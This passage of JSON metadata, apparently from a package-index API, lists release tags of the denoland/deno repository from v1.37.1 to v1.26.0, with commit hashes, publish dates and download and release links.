repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.